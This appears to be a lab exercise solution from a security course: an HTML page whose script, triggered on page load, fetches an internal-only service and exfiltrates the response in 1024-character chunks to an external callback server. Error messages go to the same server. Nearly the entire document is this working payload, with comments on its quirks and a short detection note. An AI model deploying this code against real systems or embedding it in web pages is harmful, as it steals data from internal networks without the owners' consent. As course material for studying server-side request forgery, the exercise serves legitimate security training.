13.6.1
Modify the JavaScript function to avoid data truncation by sending the data in multiple requests if the data is longer than 1024 characters.
Solution
- Truncation using slice and maths
<html>
<head>
<script>
// exfiltrate function fetches internal port not accessible externally
// and then exfiltrates response text data
// this works if an internal headless chrome is compromised
// truncateString splits response to 1024 byte segments
// Returns the `ins`-th 1024-character chunk of `str` (chunk 0 is the first).
// If `str` is no longer than `num`, the whole string is returned unchanged.
// Note: the chunk boundaries below are hard-coded to 1024 and do not follow
// `num`; the two only agree because the caller passes 1024 as `num`.
function truncateString(str, num, ins) {
// short responses need no splitting
if (str.length <= num) {
return str
}
// a start index at or beyond str.length makes slice return "" rather than throw
return str.slice((1024 * ins), (1024 * (ins + 1)))
}
// Reads the response of an internal address and forwards it, in 1024-character
// chunks, as the query string of a GET request to an external callback URL.
// Detection note: from the network side this is one in-browser request to an
// internal host followed by a burst of outbound GETs whose query strings are
// long, URL-encoded blobs; the error path leaks the stringified error the same way.
function exfiltrate() {
fetch("http://172.16.16.2:8001")
.then((response) => response.text())
.then((data) => {
// resp, s_len, loop_ins and t_data are assigned without let/const,
// so they become implicit globals on window
resp = data;
s_len = 1024;
// floor(len / 1024) + 1 iterations: when the length is an exact multiple
// of 1024 the last iteration sends an empty chunk
loop_ins = Math.floor(resp.length / s_len)
for (let i = 0; i <= loop_ins; i++) {
t_data = truncateString(resp, s_len, i);
// fire-and-forget: not awaited, so request order and completion are not
// guaranteed, and a rejection here is not reached by the .catch below
fetch("http://192.168.119.190/callback?" + encodeURIComponent(t_data));
}
}).catch(err => {
// only rejections of the fetch/text chain above land here; err is
// string-coerced by encodeURIComponent
fetch("http://192.168.119.190/error?" + encodeURIComponent(err));
});
}
</script>
</head>
<body onload='exfiltrate()'>
<div></div>
</body>
</html>
